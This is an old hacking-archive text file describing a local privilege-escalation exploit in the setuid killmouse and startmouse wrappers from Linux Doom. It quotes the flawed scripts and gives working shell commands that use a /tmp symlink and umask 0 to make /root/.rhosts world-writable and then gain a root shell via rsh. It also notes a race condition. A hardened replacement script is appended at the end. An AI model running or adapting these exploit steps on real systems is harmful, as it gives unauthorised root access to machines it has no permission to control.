gpm-exploit.txt (Freaks Macintosh Archive, Hacking & Misc / bundle of exploits), text file, 1998-07-17
System:
Probably Linux specific. Slackware 3.0 (installs Linux 1.2.13) systems that
have the gpm utility and/or the Doom package installed are vulnerable.
Other distributions might be too.
Impact:
Local users can acquire root status.
Background:
The problem is the killmouse/startmouse command that is part of the Doom
package on Linux systems. It is actually a C wrapper that runs two
scripts (killmouse.sh/startmouse.sh). It runs suid root.
/usr/games/doom/startmouse.sh:
#!/bin/sh
# flag file lives in world-writable /tmp: any user can create it, or a symlink by that name
if [ -r /tmp/gpmkilled ]; then
/usr/bin/grep gpm /etc/rc.d/rc.local > /tmp/gpmscript
# /tmp/gpmscript can be swapped between the grep above and the sh below
/bin/sh /tmp/gpmscript; /bin/rm /tmp/gpmscript /tmp/gpmkilled
fi
/usr/games/doom/killmouse.sh:
#!/bin/sh
if /bin/ps ax | /usr/bin/grep -v grep | /usr/bin/grep "gpm" ; then
# touch runs as root, inherits the caller's umask and follows symlinks
GPM_RUNNING=true; /bin/killall gpm; /bin/touch /tmp/gpmkilled
fi
Problem:
I would try to describe the problem but I can't stop laughing.
Exploit:
This can be exploited in a few similar ways. Here's just one. Let's
assume the gpm utility is not running. We can't start it up ourselves
as gpm is only to be run by root. So we'll use startmouse to fire it up:
$ touch /tmp/gpmkilled
$ /usr/games/doom/startmouse
$ ps -aux | grep gpm
bo 1436 0.0 2.0 40 312 v03 R 16:33 0:00 grep gpm
root 1407 0.0 2.4 42 368 ? S 16:24 0:00 /usr/bin/gpm t ms
Fine, it's running. Now we'll use killmouse to kill the process, but
first we set our umask to 0 and link /tmp/gpmkilled to /root/.rhosts:
$ umask 0
$ ln -s /root/.rhosts /tmp/gpmkilled
$ /usr/games/doom/killmouse
1407 ? S 0:00 gpm t ms
$ ls -l /root/.rhosts
-rw-rw-rw- 1 root users 0 Dec 13 16:44 /root/.rhosts
$ echo localhost bo > /root/.rhosts
$ rsh -l root localhost sh -i
bash#
Bingo. On some systems gpm might not be started in /etc/rc.d/rc.local
so the startmouse script will fail. But gpm might be running already.
If neither of these conditions is met, note that startmouse.sh creates
/tmp/gpmscript and runs it in a shell. There's a window of time between
creating the script and executing it, so we have a nice race condition
here; it can be replaced with anything you like prior to execution.
Solution:
Remove setuid bits of killmouse/startmouse. Better yet - nuke them.
While you're at it, nuke Doom too - it's a stupid game anyway :-)
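If the wrappers are kept at all, the two scripts can be rewritten so that each of the three flaws above (inherited umask, symlink-following touch in /tmp, re-executed /tmp script) is closed. This is an added example, not the Doom package's own code; STATE_DIR (a root-owned, mode 0700 directory outside /tmp) and the use of pgrep/killall are assumptions.

```shell
#!/bin/sh
# Hardened replacements for killmouse.sh/startmouse.sh (added example).
#  1. umask is forced, so a caller's "umask 0" cannot make files that the
#     setuid wrapper creates as root world-writable;
#  2. the flag file is created exclusively and honoured only if it is a
#     regular file reached without following a symlink, so linking it to
#     /root/.rhosts achieves nothing;
#  3. the gpm start line is piped straight into sh instead of being copied
#     to a fixed /tmp path and executed later, so there is no file to race.
# Assumptions: STATE_DIR is root-owned, mode 0700 and not under /tmp;
# pgrep (procps) and killall (psmisc) are installed.

STATE_DIR="${STATE_DIR:-/var/run/doom-mouse}"
FLAG="$STATE_DIR/gpmkilled"
umask 077

# Exclusive create of $1: with noclobber set, '>' fails if the path already
# exists in any form (regular file, live or dangling symlink), so root never
# writes through a planted link. Returns non-zero on refusal.
create_flag() {
    ( set -C; : > "$1" ) 2>/dev/null
}

# True only for a regular file that is not itself a symlink.
safe_flag() {
    [ ! -L "$1" ] && [ -f "$1" ]
}

# killmouse.sh replacement: stop gpm and record that we did so.
killmouse() {
    if pgrep -x gpm >/dev/null 2>&1; then
        killall gpm
        create_flag "$FLAG" || { echo "refusing to create $FLAG" >&2; return 1; }
    fi
}

# startmouse.sh replacement: restart gpm only if our own flag is present.
startmouse() {
    if safe_flag "$FLAG"; then
        rm -f "$FLAG"
        # same grep as the original, but no intermediate /tmp script
        grep gpm /etc/rc.d/rc.local | /bin/sh
    fi
}
```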